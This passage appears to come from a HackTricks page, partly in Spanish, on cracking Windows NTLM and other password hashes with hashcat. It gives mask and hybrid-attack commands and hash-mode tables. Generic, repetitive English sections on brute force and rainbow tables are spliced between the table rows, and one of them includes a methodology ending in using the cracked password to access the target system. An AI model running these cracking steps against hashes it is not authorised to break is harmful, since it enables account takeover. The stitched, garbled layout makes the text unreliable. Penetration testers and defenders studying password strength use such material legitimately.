hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.

# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
  • Ataque de Wordlist + Máscara (-a 6) / Ataque de Máscara + Wordlist (-a 7)
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d

# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt

Modos de Hashcat

hashcat --example-hashes | grep -B1 -A2 "NTLM"

Brute Forcing

Dictionary Attack

A dictionary attack involves using a list of common passwords to attempt to crack passwords. This method is more efficient than a brute-force attack as it tries a predefined list of passwords.

Brute Force Attack

A brute force attack involves trying all possible combinations of characters until the correct password is found. This method is time-consuming but effective, especially for complex passwords.

Rainbow Tables

Rainbow tables are precomputed tables used in password cracking to reverse hash functions and discover passwords. They can significantly speed up the cracking process by avoiding the need to hash each possible password repeatedly.

500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Brute-Force

Introduction

Brute-force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is often used to crack password hashes.

Tools

There are several tools available for performing brute-force attacks on Windows hashes, such as:

  • John the Ripper: A popular password-cracking tool that can be used for Windows hashes.
  • Hashcat: Another powerful tool for cracking password hashes, including Windows hashes.
  • Hydra: A versatile password-cracking tool that supports various protocols, including SMB (used in Windows environments).

Methodology

  1. Capture Hash: Obtain the password hash from the target system.
  2. Select Tool: Choose a suitable brute-force tool based on the hash type.
  3. Configure Tool: Set up the tool with the necessary parameters, such as hash type and character set.
  4. Initiate Attack: Start the brute-force attack and wait for the tool to find the correct password.
  5. Crack Password: Once the tool successfully cracks the password, use it to access the target system.

Considerations

  • Brute-force attacks can be time-consuming, especially for complex passwords.
  • It is essential to use a good wordlist and customize the attack parameters for better results.
  • Always ensure you have permission to perform such attacks, as unauthorized access is illegal.
3000 | LM                                               | Operating-Systems
1000 | NTLM                                             | Operating-Systems

Brute Force

Introduction

Brute force attacks are a common method used to crack passwords by systematically trying all possible combinations until the correct one is found. This technique can also be applied to crack common application hashes.

Methodology

  1. Identify Hash Algorithm: Determine the hash algorithm used by the application to hash passwords.

  2. Generate Wordlist: Create a wordlist containing common passwords, dictionary words, and variations.

  3. Hash Wordlist: Hash all the words in the wordlist using the same algorithm as the application.

  4. Compare Hashes: Compare the generated hashes with the target hash to find a match.

  5. Automate: Use automated tools like hashcat or John the Ripper to automate the brute force process.

Resources

  • Hashcat: A popular password cracking tool that supports multiple hash algorithms.

  • John the Ripper: Another powerful password cracking tool that can be used for brute force attacks.

By following these steps and utilizing the right tools, you can effectively crack common application hashes using brute force techniques.

900 | MD4                                              | Raw Hash
0 | MD5                                              | Raw Hash
5100 | Half MD5                                         | Raw Hash
100 | SHA1                                             | Raw Hash
10800 | SHA-384                                          | Raw Hash
1400 | SHA-256                                          | Raw Hash
1700 | SHA-512                                          | Raw Hash
Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team de AWS de HackTricks)!

Otras formas de apoyar a HackTricks:


Utiliza Trickest para construir y automatizar flujos de trabajo fácilmente impulsados por las herramientas comunitarias más avanzadas del mundo.
¡Accede hoy mismo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}